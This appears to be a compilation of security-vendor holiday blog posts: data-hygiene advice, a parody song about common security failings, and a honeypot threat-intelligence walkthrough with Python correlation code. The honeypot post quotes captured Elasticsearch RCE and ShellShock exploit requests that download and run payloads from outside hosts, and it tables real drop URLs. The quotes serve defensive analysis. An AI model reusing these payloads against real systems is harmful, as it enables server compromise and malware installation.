These findings are not a surprise and appear to be issues we commonly encounter when examining an IoT product's ecosystem. What is the solution to resolving these issues, then?
First, IoT manufacturers can easily apply some basic testing across these areas to quickly identify and fix vulnerabilities in products prior to going to market. Second, we as end users can change default passwords, such as the standard login password and the WiFi WPA PSK, to protect our devices from many forms of compromise. It is also important to note that these IoT research projects are just a few examples of the dedication that Rapid7 and its employees have in regard to securing the world of IoT. These research projects allow us to continually expand our knowledge around IoT security and vulnerabilities. By working closely with vendors to identify and mitigate issues, we can continue to help those vendors expand their working knowledge of security, which will flow into future products. Our work also allows us to share this knowledge with consumers so they can make better choices and mitigate common risks that are often found within IoT products.

12 Days of HaXmas: The One Present This Data Scientist Wants This Holiday Season

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts…

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

“May you have all the data you need to answer your questions – and may half of the values be corrupted!” - Ancient Yiddish curse

This year, Christmas (and therefore Haxmas) overlaps with the Jewish festival of Chanukah. The festival commemorates the recapture of the Second Temple. As part of the resulting cleaning and sanctification process, candles were required to burn continuously for seven days – but there was only enough oil for one. Thanks to the intervention of God, that one day of oil burned for eight days, and the resulting eight-day festival was proclaimed. Unfortunately, despite God getting involved in everything from the edibility of owls (it's in Deuteronomy, look it up) to insufficient stocks of oil, there's no record of divine intervention to solve for insufficient usable data, and that's what we're here to talk about. So pull up a chair, grab yourself a plate of latkes, and let's talk about how you can make data-driven security solutions easier for everyone.

Data-Driven Security

As security problems have grown more complex and widespread, people have attempted to use the growing field of data science to diagnose issues, both on the macro level (industry-wide trends and patterns found in the DBIR) and the micro (responding to individual breaches). The result is Data-Driven Security, covered expertly by our Chief Data Scientist, Bob Rudis, in the book of the same name. Here at Rapid7, our Data Science team has been working on everything from systems to detect web shells before they run (see our blog post about webshells) to internal projects that improve our customers' experience. As a result, we've seen a lot of data sources from a lot of places, and have some thoughts on what you can do to make data scientists' problem-solving easier before you even know you have an issue.

Make sure data is available

Chanukah has just kicked off and you want two things: to eat fritters and to apply data science to a bug, breach, or feature request. Luckily you've got a lot of fritters and a lot of data – but how much data do you actually have? People tend to assume that data science is all about the number of observations. If you've got a lot of them, you can do a lot; only a few, and you can only do a little. Broadly speaking, that's true, but the span of time data covers and the format it takes are also vitally important.

Seasonal effects are a well-studied phenomenon in human behavior and, by extension, in data (which, one way or another, tends to relate to how humans behave). What people do and how much they do it shifts between seasons, between months, even between days of the week. This means that the length of time your data covers can make the difference between a robust answer and an uncertain one – if you've only got a Chanukah's worth, we can draw patterns in broad strokes, but we can't eliminate the impact seasonal changes might have. The problem with this is that storing a lot of data over a long period of time is hard, potentially expensive, and a risk in and of itself – it's not great for user or customer privacy, and in the event of a breach it's another juicy thing the attacker can carry off.
As a result, people tend to aggregate their raw data, which is fine if you know the questions you're going to want answered. If you don't, though, the same thing that protects aggregated data from malicious attackers will stymie data scientists: it's very hard, if you're doing it right, to reverse-engineer aggregation, and so researchers are limited to whatever fields or formats you thought were useful at the time, which may not be the ones they actually need. One solution to both problems is to keep data over a long span of time, in its raw format, but sample: keep 1 random row out of 1,000, or 1 out of 10,000, or an even higher ratio. That way data scientists can still work with it and avoid seasonality problems, but it becomes a lot harder for attackers to reconstruct the behavior of individual users. It's still not perfect, but it's a nice middle ground.

Make sure data is clean

It's the fourth day of Chanukah, you've implemented that nice sampled data store, and you even managed to clean up the sufganiyot the dog pulled off the table and joyously trod into the carpet in its excitement to get human food. You're ready to get to work, you call the data scientists in, and they watch as this elegant sampled datastore collapses into a pile of mud, because three months ago someone put a tab in a field that shouldn't have a tab and now everything has to be manually reconstructed. If you want data to be reliable, it has to be complete and it has to be clean. By complete, we mean that if a particular field only has a meaningful value a third of the time, for whatever reason, it's going to be difficult to rely on it (particularly in a machine learning context, say). By clean, we mean that there shouldn't be unexpected values, particularly the sort of unexpected value that breaks data formatting or reading. In both cases the answer is data validity checks. Just as engineers have tests – tasks that run every so often to ensure changes haven't unexpectedly broken code – data storage systems and their associated code need validity checks, which run against a new row every so often and make sure that it has all of its values, that they're properly formatted, and that those values are about what they should be.
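To tie the sampling and validity ideas together, here is an entirely hypothetical sketch of mine; the field names, timestamp format, and the 1-in-1,000 ratio are invented for illustration:

# A minimal sketch of 1-in-1,000 sampling with per-row validity checks.
# The field names and formats here are hypothetical, not a real pipeline.
import random
from datetime import datetime

REQUIRED_FIELDS = ("timestamp", "source_ip", "request_path")

def is_valid(row):
    """Reject rows with missing values or unexpected formats."""
    if any(not row.get(f) for f in REQUIRED_FIELDS):
        return False
    if any("\t" in v for v in row.values()):  # the dreaded stray tab
        return False
    try:
        datetime.strptime(row["timestamp"], "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return False
    return True

def sample_and_validate(rows, ratio=1000):
    """Keep roughly 1 random row out of `ratio`, flagging invalid ones."""
    for row in rows:
        if random.randrange(ratio) == 0:
            if is_valid(row):
                yield row
            else:
                print(f"validity check failed: {row!r}")

# Example usage with well-formed rows:
rows = [{"timestamp": "2016-12-10 13:42:45",
         "source_ip": "203.0.113.7",
         "request_path": "/index.html"}] * 5000
print(sum(1 for _ in sample_and_validate(rows)))  # roughly 5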
Make sure data is documented

It's the last day of Chanukah, you've got a sampled data store with decent data, the dreidel has rolled under the couch and you can't get it out, and you just really, really want to take your problem and your data and smush them together into a solution. The data scientists read in the data, nothing breaks this time… and they are promptly stumped by columns with names like “Date Of Mandatory Optional Delivery Return (DO NOT DELETE, IMPORTANT)” or simply “f”. Nobody should be expected to work with that kind of thing. Every time you build a new data store and get those validity checks set up, you should also be setting up documentation. Where it lives will vary from company to company, but it should exist somewhere and set out what each field means (“the date/time the request was sent”), an example of what sort of value it contains (“2016-12-10 13:42:45”), and any caveats (“The collectors were misconfigured from 2016-12-03 to 2016-12-04, so any timestamps then are one hour off”). That way, data scientists can hit the ground running, rather than spending half their time working out what the data even means.

So, as you prepare for Chanukah and 2017, you should be preparing for data science, too. Make sure your data is (respectfully) collected, make sure your data is clean, and make sure your data is documented. Then you can sit back and eat latkes in peace.

The Twelve Pains of Infosec

One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now…

One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now that I am in information security, I decided it is time for a new satire (maybe this will start a new tradition), and so I am presenting: the 12 Pains of Infosec.

The first thing in infosec that's such a pain to me is your password policy

The second thing in infosec that's such a pain to me is default credentials, and your password policy

The third thing in infosec that's such a pain to me is falling for phishing, default credentials, and your password policy

The fourth thing in infosec that's such a pain to me is patch management, falling for phishing, default credentials, and your password policy

The fifth thing in infosec that's such a pain to me is Windows XP, patch management, falling for phishing, default credentials, and your password policy

The sixth thing in infosec that's such a pain to me is lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The seventh thing in infosec that's such a pain to me is no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The eighth thing in infosec that's such a pain to me is users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The ninth thing in infosec that's such a pain to me is lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The tenth thing in infosec that's such a pain to me is testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The eleventh thing in infosec that's such a pain to me is no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The twelfth thing in infosec that's such a pain to me is trust in antivirus, no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy

The first thing in infosec that's such a pain to me is your password policy

When I go into organizations for penetration tests, one of the easiest ways to get in is through password guessing. Most organizations use a password policy of 8 characters, complexity turned on, and a change every 90 days. So, what do the users do? They come up with a simple-to-remember password that will never repeat. Yes, I am talking about the infamous Winter16 or variations of season and year. If they aren't using that password, then chances are it is something just as simple. Instead, set a longer password requirement (12 characters or more) and blacklist common words, such as password, seasons, months, and the company name.
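A blacklist like that is simple to enforce. Here is a minimal sketch of my own (not from the original post) of the kind of check a password filter could apply; the word list is a hypothetical starter set:

# A minimal sketch of the password policy described above: 12+ characters,
# with common words blacklisted. A real deployment would tailor the
# blacklist to the organization; "acmecorp" is a hypothetical company name.
BLACKLIST = {"password", "winter", "spring", "summer", "autumn", "fall",
             "january", "february", "december", "acmecorp"}

def password_ok(candidate: str) -> bool:
    if len(candidate) < 12:
        return False
    lowered = candidate.lower()
    return not any(word in lowered for word in BLACKLIST)

print(password_ok("Winter16!"))             # False: too short, seasonal
print(password_ok("correct horse battery")) # True: long, no banned words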
The second thing in infosec that's such a pain to me is default credentials

The next most common finding I see is the failure to change default credentials. It is such a simple mistake, but one that can cost your organization a ton! This doesn't just go for web apps like JBoss and Tomcat, but also for embedded devices. Printers and other embedded devices are a great target, since their default credentials aren't usually changed. They often hold credentials to other systems to help gain access, or can simply be used as a pivot point to attack other systems.

The third thing in infosec that's such a pain to me is falling for phishing

Malicious actors go for the weakest link. Often this is the users. Sending a carefully crafted phishing email is almost 100% successful. In fact, even many security professionals fall victim to phishing emails. So, what can we do about it? Well, we must train our employees regularly to spot phishing attempts, as well as encourage and reward them for alerting security to phishing attempts. Once reported, add the malicious URL to your blacklist and redirect to a phishing education page. And for goodness sake, Security Department, please disable the links and remove any tags in the email before forwarding it off as "education".

The fourth thing in infosec that's such a pain to me is patch management

There are so many systems out there, and it can be hard to patch them all, but having a good patch management process is essential. Ensuring our systems are up to date with the latest patches will help protect those systems from known attacks. It is not just operating system patches that need to be applied, but also patches for any software you have installed.

The fifth thing in infosec that's such a pain to me is Windows XP

Oh Windows XP, how I love and hate thee. Even though Windows XP support went the way of the dodo back in 2014, over 2.5 years later I still see it being used in corporate environments. While I called out Windows XP, it is not uncommon to see Windows 2000, Windows Server 2003, and other unsupported operating systems as well. While some of the issues with these operating systems have been mitigated, such as MS08-067, many places have not applied the patches or taken the mitigation tactics. That is not to mention the unknown security vulnerabilities that exist and will never be patched. Your best bet is to upgrade to a supported operating system. If you cannot for some reason (required software will not run on newer operating systems), segregate the network to prevent access to the unsupported systems.

The sixth thing in infosec that's such a pain to me is lack of input filtering

We all know and love the OWASP Top 10. Three of the top 10 are included in this pain. Cross-Site Scripting (XSS), SQL Injection (SQLi), HTML Injection, Command Injection, and HTML Redirects are all vulnerabilities that can be solved fully, or at least partially in the case of XSS, with input filtering. Web applications that perform input filtering will remove bad characters, allow only good characters, and perform the input filtering not at the client side, but at the server side. Then, using output encoding/filtering, XSS is remediated as well.
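As a quick sketch of what that looks like in practice (my own illustration, with a hypothetical allowlist pattern, not code from the original post):

# A minimal sketch of server-side input filtering plus output encoding.
# The username pattern is a hypothetical example; real applications
# should validate each field against its own expected format.
import html
import re

USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")  # allow only good characters

def accept_username(raw: str) -> str:
    """Server-side validation: reject anything outside the allowlist."""
    if not USERNAME_RE.match(raw):
        raise ValueError("invalid username")
    return raw

def render_comment(comment: str) -> str:
    """Output encoding: neutralize markup so reflected XSS is remediated."""
    return f"<p>{html.escape(comment)}</p>"

print(render_comment("<script>alert(1)</script>"))
# <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>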
The seventh thing in infosec that's such a pain to me is no monitoring

In 1974, Muhammad Ali said “His hands can't hit what his eyes can't see,” referring to his upcoming fight with George Foreman. This quote holds true in infosec as well. You cannot defend what you cannot see. If you are not performing monitoring in your network, and centralized monitoring so you can correlate the logs, you will miss attacks. As Dr. Eric Cole says, “Prevention is ideal, but detection is critical.” It is also critical to REVIEW the logs, meaning you will need good people who know what they are looking for, not just good monitoring software.

The eighth thing in infosec that's such a pain to me is users as local admins

For years we have been suggesting segregating user privileges, yet on almost every penetration test I perform I find this to be an issue. Limiting accounts to only what is needed to do the job is very hard, but essential to securing your environment. This means not giving local administrator privileges to all users, but also using separate accounts for managing the domain, limiting the number of privileged accounts, and monitoring the use of these accounts and group memberships.

The ninth thing in infosec that's such a pain to me is lack of management support

How often do I run into people who want to make a change or changes in their network, yet they do not get the support needed from upper management? A LOT! Sometimes an eye-opening penetration test works wonders.

The tenth thing in infosec that's such a pain to me is testing for compliance

I get it, certain industries require specific guidelines to show adequate security is in place, but when you test only for compliance's sake, you are doing a disservice to your organization. When you attempt to limit the scope of the testing or firewall off the systems during the test, you are pulling a blinder over your eyes, and cannot hope to secure your data. Instead, use the need for testing to meet compliance as a way to get more management support and enact real change in the organization.

The eleventh thing in infosec that's such a pain to me is no asset management

You can't protect what you don't know about. In this regard, employ an asset management system. Know what devices you have and where they are located. Know what software you have, and what patch levels it is at. I can't tell you how many times I have exploited a system and my customer says “What is that? I don't think that is ours,” only to find out that it was their system; they just didn't have good asset management in place.

The twelfth thing in infosec that's such a pain to me is trust in antivirus

A few years ago, I read that antivirus software was only about 30% effective, leading to headlines about the death of antivirus, yet it still is around. Does that mean it is effective in stopping infections on your computer? No. I am often asked “What is the best antivirus I should get for my computer?” My answer is usually to grab a free antivirus like Microsoft Security Essentials, but be careful where you surf on the internet and what you click on. Antivirus will catch the known threats, so I believe it still has some merit, especially on home computers for relatives who do not know better, but the best protection is being careful. Turn on “click to play” for Flash and Java (if you can't remove Java). Be careful what you click on. Turn on an ad blocker. There is no single “silver bullet” in security that is going to save you. It is a layering of technologies and awareness that will.

I hope you enjoyed the song, and who knows, maybe someone will record a video singing it! (not me!) Whatever holiday you celebrate this season, have a great one. Here's to a more secure 2017 so I don't have to write a new song next year. Maybe “I'm Dreaming of a Secure IoT” would be appropriate.

12 Days of HaXmas: Beginner Threat Intelligence with Honeypots

This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than to sift through some honeypot / firewall / IDS logs and try to…

This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than to sift through some honeypot / firewall / IDS logs and try to make sense of them, right? At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning, by making use of honeypot and darknet tools. More precisely, we're running a couple of honeypots spread around the world and collecting raw traffic PCAP files with something similar to tcpdump (just slightly more clever). This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually.

Some background

The honeypot is fairly simple: it waits for incoming connections and then tries to figure out what to do with them. It might need to treat a connection as an SSL/TLS connection, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with some very basic honeypot that just opens a port and waits for requests, you will quickly find things like this:

GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+http://61.176.223.109:1111/zldyls\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1
Host: redacted:9200
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server

or this:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: redacted
Connection: Close

What we're looking at are ElasticSearch (slightly modified, as the path was URL-decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward: there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind them on the web (e.g. [1], [2], [3]).

Now because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc command), it will then try to download that file. We could also do this at the post-processing stage, but by then the URL might not be available any more, as these things tend to disappear or get taken down quickly.
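The URL extraction can be as simple as a regular expression run over the request payload. This is a rough sketch of my own, not the actual honeypot code; it assumes we only care about URLs appearing inside common download commands:

# A rough sketch of the URL-extraction idea described above (not the
# actual honeypot code): look for download commands and pull out the
# URL that follows them.
import re

DOWNLOAD_RE = re.compile(
    r"(?:wget|curl|fetch|lwp-download)[^;\"']*?(https?://[^\s;\"']+)")

def extract_drop_urls(payload: str) -> list:
    return DOWNLOAD_RE.findall(payload)

request = ("() { :;}; /bin/sh -c \"cd /tmp; "
           "wget http://109.228.25.87/.c.txt ; "
           "curl -O http://109.228.25.87/.c.txt\"")
print(extract_drop_urls(request))
# ['http://109.228.25.87/.c.txt', 'http://109.228.25.87/.c.txt']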
Looking at the unique files from the last half year (roughly), we can count the following file types (reduced/combined for readability):

178 ELF 32-bit LSB executable Intel 80386
 66 a /usr/bin/perl script ASCII text executable
 33 Bourne-Again shell script ASCII text executable
 14 POSIX tar archive (GNU)
 14 ELF 64-bit LSB executable x86-64
  4 ELF 32-bit LSB executable MIPS
  2 ELF 32-bit LSB executable ARM
  1 ELF 32-bit MSB executable PowerPC or cisco 4500
  1 ELF 32-bit MSB executable MIPS
  1 OpenSSH DSA public key

Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see, there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targeting of quite a few different architectures. These are mostly binaries for embedded routers and, for example, the QNAP devices that are vulnerable to ShellShock.

Getting started on the logs

What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection", "I found a URL in a request", and "I downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability):

$ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json

{
  "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998",
  "utcts": "2015-12-13T07:36:59.444356Z",
  "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9",
  "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc",
  "url.netloc": "ys-k.ys168.com",
  "source": "117.175.110.177",
  "source.country_code": "CN",
  "sensor": "redacted",
  "sensor.country_code": "JP",
  "dport": 9200,
  "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  "http.method": "POST",
  "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD"
}
...

Now we can take these logs and do some correlation, creating one record per "attack". We also add a couple more data sources (ASN lookup, file types for the downloaded files, etc.). For the sake of this post, let's focus on the attacks which led to downloadable files and that we could categorize as ShellShock / ElasticSearch exploits.
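The correlation step itself can be approximated in a few lines of Python. This is a simplified sketch of my own, not our backend code; it assumes the events have already been parsed into dicts like the one above, read from a hypothetical "events.json" file:

# A simplified sketch of the per-attack correlation described above,
# not the actual backend code: group events by source IP and count
# the values seen in a few interesting fields.
import collections
import json

FIELDS = ("dport", "http.method", "vulns", "sha1", "url")

attacks = collections.defaultdict(
    lambda: collections.defaultdict(collections.Counter))

with open("events.json") as fh:          # hypothetical input file
    for line in fh:
        event = json.loads(line)
        for field in FIELDS:
            if field in event:
                attacks[event["source"]][field][event[field]] += 1

for source, counters in attacks.items():
    print(source, {f: counters[f].most_common(3) for f in FIELDS})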
By writing a quick formatting script that does some counting of fields we get something pretty like this (using python prettytable) (full version):

+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| key             | count | seen              | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 221.224.57.66   | 89    | first: 2015-08-05 | 54x US        | 89x 9200   | 89x GET    | 89x VULN-ELASTICSEARCH-RCE  | 88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e  | 84x http://183.56.173.131:999/xiaojiba                                         |
| CN              |       | last: 2015-08-08  | 14x JP        |            |            | CVE-2014-3120               | 1x b6bb2b7cad3790887912b6a8d2203bebedb84427   | 4x http://221.224.57.66:999/xiaojiba                                           |
| AS 4134         |       |                   | 10x AU        |            |            | EXEC-SHELLCMD               |                                               | 1x http://221.224.57.66:999/qqqq                                               |
|                 |       |                   | 5x IE         |            |            |                             |                                               |                                                                                |
|                 |       |                   | 3x SG         |            |            |                             |                                               |                                                                                |
|                 |       |                   | 3x BR         |            |            |                             |                                               |                                                                                |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 61.147.103.74   | 87    | first: 2015-05-06 | 55x US        | 87x 9200   | 87x GET    | 87x VULN-ELASTICSEARCH-RCE  | 87x f7b229a46b817776d9d2c1052a4ece2cb8970382  | 72x http://61.147.103.74/Aqks                                                  |
| CN              |       | last: 2015-05-27  | 15x SG        |            |            | CVE-2014-3120               |                                               | 15x http://61.147.103.74/Aqmds                                                 |
| AS23650         |       |                   | 11x AU        |            |            | EXEC-SHELLCMD               |                                               |                                                                                |
|                 |       |                   | 4x JP         |            |            |                             |                                               |                                                                                |
|                 |       |                   | 2x IE         |            |            |                             |                                               |                                                                                |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 117.175.111.10  | 63    | first: 2015-10-26 | 21x IE        | 63x 9200   | 63x POST   | 63x VULN-ELASTICSEARCH-RCE  | 48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9  | 18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm          |
| CN              |       | last: 2015-10-27  | 11x US        |            |            | CVE-2014-3120               | 15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e  | 15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc           |
| AS 9808         |       |                   | 9x JP         |            |            | EXEC-SHELLCMD               |                                               | 15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip           |
|                 |       |                   | 8x AU         |            |            |                             |                                               | 9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto            |
|                 |       |                   | 8x SG         |            |            |                             |                                               | 5x http://183.60.202.97:12100/mmml                                             |
|                 |       |                   | 6x BR         |            |            |                             |                                               | 1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt           |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 189.190.50.56   | 50    | first: 2015-11-05 | 23x US        | 50x 80     | 50x GET    | 50x VULN-SHELLSHOCK         | 37x 21762efb4df7cbb6b2331b34907817499f53be99  | 37x http://189.190.50.56/.b.gif                                                |
| MX              |       | last: 2015-12-02  | 22x AU        |            |            | CVE-2014-6271               | 4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e   | 4x http://189.190.50.56/b.gif                                                  |
| AS 8151         |       |                   | 5x BR         |            |            |                             | 4x 3a33f909c486406773b06d8da3b57f530dd80de6   | 4x http://173.220.57.150/scans/ip75.tar                                        |
|                 |       |                   |               |            |            |                             | 3x ebbe8ebb33e78348a024f8afce04ace6b48cc708   | 3x http://173.220.57.150/scans/dom66.tar                                       |
|                 |       |                   |               |            |            |                             | 2x 3caf6f7c6f4953b9bbba583dce738481da338ea7   | 2x http://173.220.57.150/scans/php77.tar                                       |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
...

With my test dataset of roughly 2000 "attacks with downloads", this leads to 195 unique sources that make use of several drop URLs and payloads over the course of a couple of months.

Basic Threat Intelligence

Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition, there are also more in-depth methods, like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further. The problem though is that manually doing this grouping is painful, as it's not enough to go one level deep. A source that uses a couple of binaries which are also used by another source is the first layer. But then those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points, like an attacker IP, a file hash, a drop host IP/name, etc., can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories. If you create a graph for our honeypot data set, it looks like this:

[graph visualization of the connected honeypot indicators omitted]

So to categorize our incidents into attacker groups, we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads, and hosts contacted by the malware samples themselves (sadly I didn't get to do this for all of them).
import collections
import json

# DATA is assumed to be the list of enriched honeypot events,
# one dict per attack (see the example record above).

GRAPH = collections.defaultdict(set)

def add_edge(fr, to):
    # undirected
    GRAPH[fr].add(to)
    GRAPH[to].add(fr)

def graph_traversal(src):
    # breadth-first walk over the connected subgraph containing src,
    # yielding each (parent, child) edge exactly once
    visited = set([src])
    queue = [src]
    while queue:
        parent = queue.pop(0)
        for child in GRAPH[parent]:
            if child not in visited:
                yield parent, child
                visited.add(child)
                queue.append(child)

# build the graph: attacker source <-> payload hash <-> drop host / C2 hosts
for e in DATA:
    src = ("source", e["source"])
    payload = ("payload", e["sha1"])
    payloadsrc = ("payloadsrc", e["url.netloc"])
    add_edge(src, payload)
    add_edge(payload, payloadsrc)
    for i in e.get("mal.tcplist", []):
        add_edge(payload, ("c2", i))

# emit one group per connected subgraph
n = 1
seen = set()
for src in set(e["source"] for e in DATA):
    if src in seen:
        continue
    members = set()
    indicators = set()
    for (ta, va), (tb, vb) in graph_traversal(("source", src)):
        if ta == "source":
            members.add(va)
        else:
            indicators.add((ta, va))
        if tb == "source":
            members.add(vb)
        else:
            indicators.add((tb, vb))
    print(json.dumps(dict(members=list(members), indicators=list(indicators), group=n)))
    n += 1
    seen |= members

This leads to 81 groups, as shown by the next table (full version):

+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| key | count | seen | source | sourcecountry | srcasn | sensorcountry | dport | httpmethod | vulns | sha1 | url |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 3 | 224 | first: 2015-04-09 | 144x 115.29.174.5 | 210x CN | 144x AS37963 | 84x US | 224x 9200 | 158x POST | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af | 65x http://23.234.25.203:15826/udpg |
| | | last: 2015-12-13 | 31x 222.186.21.201 | 14x KR | 66x AS23650 | 44x IE | | 66x GET | CVE-2014-3120 | 81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 | 53x http://23.234.25.203:15826/dos |
| | | | 14x 14.45.176.29 | | 14x AS 4766 | 26x JP | | | EXEC-SHELLCMD | | 28x http://23.234.25.203:15826/udp |
| | | | 14x 61.160.247.231 | | | 26x SG | | | | | 16x http://23.234.25.203:15826/ud |
| | | | 8x 222.186.21.195 | | | 23x AU | | | | | 13x http://47.88.21.44:15826/udp |
| | | | 7x 222.186.21.166 | | | 21x BR | | | | | 7x http://23.234.25.203:15826/xxoo |
| | | | 5x 61.160.223.35 | | | | | | | | 7x http://61.160.223.35:15826/udp |
| | | | 1x 222.186.34.70 | | | | | | | | 7x http://23.234.25.203:15826/L88 |
| | | | | | | | | | | | 6x http://23.234.25.203:15826/xf23 |
| | | | | | | | | | | | 5x http://43.230.147.30:2017/udp |
| | | | | | | | | | | | 4x http://61.160.247.231:15826/udp |
| | | | | | | | | | | | 4x http://23.234.25.203:15826/udp110 |
| | | | | | | | | | | | 3x http://222.186.50.47:15826/udpg |
| | | | | | | | | | | | 3x http://222.186.21.201:15826/udp |
| | | | | | | | | | | | 3x http://222.186.34.70:2018/udp |
+-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 12 | 23 | first: 2015-11-17 | 9x 206.217.134.130 | 19x US | 9x AS36352 | 18x US | 15x 80 | 15x GET | 15x VULN-SHELLSHOCK | 8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf | 8x http://192.240.106.106/lga |
| | | last: 2015-12-13 | 4x 198.245.72.234 | 2x TR | 4x AS55286 | 3x AU | 8x 9200 | 8x POST | CVE-2014-6271 | 8x c30026c548cd45be89c4fb01aa6df6fd733de964 | 2x http://69.30.200.250/ide.docx |
| | | | 4x 69.12.70.34 | 1x CA | 4x AS 8100 | 1x JP | | | 8x VULN-ELASTICSEARCH-RCE | 5x fe01a972a63f754fed0322698e16b2edc933f422 | 2x http://188.138.41.134/dd.exe |
